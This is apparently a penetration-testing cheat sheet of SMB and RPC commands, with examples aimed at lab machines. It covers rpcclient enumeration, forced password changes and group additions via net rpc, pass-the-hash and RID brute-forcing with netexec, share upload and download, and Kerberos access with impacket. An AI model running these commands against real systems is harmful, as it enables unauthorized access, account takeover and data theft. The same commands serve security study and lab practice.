SMB and RPC

RPCCLIENT

rpcclient -U "" -N [IP]

rpcclient -U "Username" -N 10.10.11.42

When connecting via rpcclient

Query

Description

srvinfo

Server information.

enumdomains

Enumerate all domains that are deployed in the network.

querydominfo

Provides domain, server, and user information of deployed domains.

netshareenumall

Enumerates all available shares.

netsharegetinfo <share>

Provides information about a specific share.

enumdomusers

Enumerates all domain users.

queryuser <RID>

Provides information about a specific user.

enumdomgroups

give groups

lookupnames <name>

give SID

querydispinfo

This will extend the amount of information about the users and their descriptions.

To add to the group

net rpc group addmem "Target Group" "Target User"  -U "Domain.local"/"Controlled USER"%'Password' -S "Domain Cintroler IP"

FOrceChangePasssword

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

SMBMAP

smbmap -H [IP] -u [Username] -p 'password'

To recursively enum directories

smbmap -H [IP] -u [Username] -p 'password' -r 'DIRECTORY NAME' --dir-only

To upload files

smbmap -u <user> -p "<password>" -d . -H [IP] --upload '/path/to/file' '/path/to/upload

SMBCLIENT

smbclient -L [IP] -N

smbclient -N -L \\\\IP

smbclient -N -L \\\\IP\\Share

smbclient //IP/SHARE NAME

smbclient -U '<USERNAME>%<PASSWORD>' //IP/SHARE NAME
smbclient -U '<USERNAME>%<PASSWORD>' -L IP

for downloading the whole directory (smbmap or smbclient)

mask "" recurse ON prompt OFF mget *

Netexec/ crackmapexec

netexec smb 172.16.1.0/24 -u anonymous -p ''  --shares

#domain auth
netexec smb 192.168.110.52-56 -u James -H "aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea" -d painters.htb

#local auth
netexec smb 192.168.110.52-56 -u James -H "aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea" -d .

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --shares

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --users

└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute

#To print sidtypuser names
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep -i 'user' | sed -E 's/.*HAZE\\([^ ]+).*/\1/' > username.txt

for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u operator -p  'operator'; echo; done

Impacket-smbclient

If we have TGT

impacket-smbclient -k -no-pass 'voleur.htb/ryan.naylor@dc.voleur.htb'

PreviousDirectory and File Fuzzing NextDNS

Last updated 4 months ago

hashtagRPCCLIENT

hashtagSMBMAP

hashtagSMBCLIENT

hashtagNetexec/ crackmapexec

hashtagImpacket-smbclient

RPCCLIENT

SMBMAP

SMBCLIENT

Netexec/ crackmapexec

Impacket-smbclient